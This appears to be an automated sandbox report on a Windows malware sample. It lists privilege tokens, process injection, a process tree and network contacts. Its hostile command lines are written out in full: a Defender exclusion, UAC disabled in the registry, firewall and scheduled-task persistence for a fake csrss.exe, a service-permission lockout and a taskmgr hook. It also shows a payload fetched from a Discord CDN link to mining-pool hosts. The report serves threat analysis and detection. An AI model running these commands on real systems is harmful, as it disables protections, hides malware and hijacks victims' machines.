Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2272 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 5676 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1720 wrote to memory of 5988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1720 wrote to memory of 5988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 5604 wrote to memory of 3216 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\System32\cmd.exe
PID 5604 wrote to memory of 3216 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe

"C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe"

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"

C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe

"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"

C:\Users\Admin\AppData\Local\Temp\u318.0.exe

"C:\Users\Admin\AppData\Local\Temp\u318.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u318.1.exe

"C:\Users\Admin\AppData\Local\Temp\u318.1.exe"

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"

C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe

"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 yip.su udp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 104.21.79.77:443 yip.su tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 217.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 14.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 192.182.67.172.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.79.201.138.in-addr.arpa udp
US 8.8.8.8:53 76.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
DE 185.172.128.228:80 tcp
US 20.157.87.45:80 tcp
DE 185.172.128.150:80 tcp
DE 185.172.128.150:80 tcp
BG 185.82.216.104:443 tcp
DE 185.172.128.150:80 tcp
US 162.159.130.233:443 tcp
US 104.21.94.82:443 tcp
US 8.8.8.8:53 211.14.97.104.in-addr.arpa udp
FR 143.244.56.51:443 tcp
BG 185.82.216.104:443 tcp
US 20.9.155.145:443 tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
BG 185.82.216.104:443 tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
BG 185.82.216.104:443 tcp
N/A 185.172.128.90:80 tcp
US 8.8.8.8:53 udp
DE 185.172.128.228:80 tcp
DE 185.172.128.59:80 tcp
US 8.8.8.8:53 udp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 20.157.87.45:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 3.33.249.248:3478 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 udp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.104:443 tcp
US 8.8.8.8:53 carsalessystem.com udp
US 104.21.94.82:443 carsalessystem.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 trythisgid.com udp
CZ 46.8.8.100:443 trythisgid.com tcp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 snickerfool.com udp
NL 80.79.4.25:80 snickerfool.com tcp
NL 80.79.4.25:80 snickerfool.com tcp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp
